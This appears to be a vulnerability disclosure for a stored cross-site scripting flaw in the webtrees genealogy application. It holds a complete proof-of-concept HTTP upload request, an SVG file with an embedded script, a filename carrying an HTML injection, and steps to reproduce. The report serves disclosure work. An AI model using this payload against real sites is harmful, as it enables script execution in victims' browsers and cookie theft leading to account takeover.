Stored XSS via upload file .svg allows for arbitrary execution of JavaScript
// PoC.req
POST /demo-dev/tree/demo/add-media-file/X9222 HTTP/2
Host: dev.webtrees.net
Cookie: __Secure-WT-ID=63trarcpiic93psog3t8okts4h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://dev.webtrees.net/demo-dev/tree/demo/media/X9222/Princess-Victoria-of-Hesse-and-by-Rhine
Content-Type: multipart/form-data; boundary=---------------------------405026258827833307651807573856
Content-Length: 1752
Origin: https://dev.webtrees.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="_csrf"
NktwFM88jQhclDtOWaJYcd0o77F8n5BI
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="file_location"
upload
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="file"; filename="xss'><img src>.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("Ghostlulz XSS");
</script>
</svg>
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="auto"
0
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="folder"
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="new_file"
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="unused"
0_Artémis_(Diane)_-_Galleria_dei_Candelabri_-_Vatican.JPG
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="remote"
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="title"
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="type"
-----------------------------405026258827833307651807573856--
Create a file .svg contain payload
Example
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("Ghostlulz XSS");
</script>
</svg>
Goto details of a person. Example: https://dev.webtrees.net/demo-dev/tree/demo/media/X9222/Princess-Victoria-of-Hesse-and-by-Rhine
At Edit button choose to ‘Add a media file’
Upload the file .svg and save it
The XSS will trigger when user click to file media. It will load file svg and trigger xss
This vulnerability has the potential to steal a user’s cookie and gain unauthorized access to that user’s account through the stolen cookie.